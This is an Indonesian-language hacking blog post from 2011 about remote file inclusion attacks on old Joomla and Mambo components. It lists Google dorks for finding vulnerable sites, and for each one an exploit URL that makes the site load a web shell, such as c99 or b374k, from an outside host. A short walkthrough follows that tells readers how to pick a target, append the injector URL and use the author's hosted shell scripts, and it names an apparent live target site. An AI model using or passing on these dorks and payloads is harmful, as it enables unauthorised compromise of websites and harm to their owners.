Minggu, 10 Juli 2011

Exploit RFI Joomla

google Dork :
inurl:"com_joomlaboard"
ExpLoit:/components/com_joomlaboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
ExpLoit:/components/com_joomlaboard/image_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_admin"
ExpLoit:/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_simpleboard
ExpLoit:/components/com_simpleboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_hashcash"
ExpLoit:/components/com_hashcash/server.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_sitemap"
ExpLoit:/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_forum"
ExpLoit:/components/com_forum/download.php?phpbb_root_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_pccookbook"
ExpLoit:/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_extcalendar
ExpLoit:/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"minibb"
ExpLoit:/components/minibb/index.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_smf"
ExpLoit:/components/com_smf/smf.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/modules/mod_calendar.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_pollxt"
ExpLoit:/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_loudmounth"
ExpLoit:/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_videodb"
ExpLoit:/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_pcchess
ExpLoit:/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google Dork;
inurl:"com_multibanners"
ExpLoit:/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_a6mambohelpdesk"
ExpLoit:/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_colophon"
ExpLoit:/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_mgm"
ExpLoit:/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_mambatstaff"
ExpLoit:/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_securityimages"
ExpLoit:/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_securityimages/lang.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_artlinks"
ExpLoit:/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_galleria"
ExpLoit:/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_zoom"
ExpLoit:/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_serverstat"
ExpLoit:/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=htt p://hostingan.com/sh3LL??
ExpLoit:/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"mambo"
ExpLoit:/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??

ok langsung ke pembahsan y ..
1. cr trget dg dork seperti diatas . dan terserah ma pake dork yg mn . dan silahkan berkreasi ..
contoh aku pake dork "com_search" . udah aku target seperti ini ..
silakan buka URL [target dibawah ini]
sesudah halaman done . lalu tmbhkan injector nya .
http://www.everyedge.com/index.php?opti … lute.path=

sudah itu kita masukan injector nya ..
ini injector yg saya sertakan .
http://motaroirhaby.com/injector/injector/b374k_modif.txt???
http://motaroirhaby.com/injector/injector/cyberIRC.txt???
http://motaroirhaby.com/injector/injector/motaro.txt???

terserah mau pake injector yg mna :)

nah injector td kita masukan dibekang web target ..
jadi seperti ini ...
Spoiler :   

kalo gmbar diatas kurang jelas silahkan klik kanan view images . trus di zoom :D

sekian semoga bermanfaat :D
credit exploit-db :D
*Motaro-Balikita

Tidak ada komentar:

Posting Komentar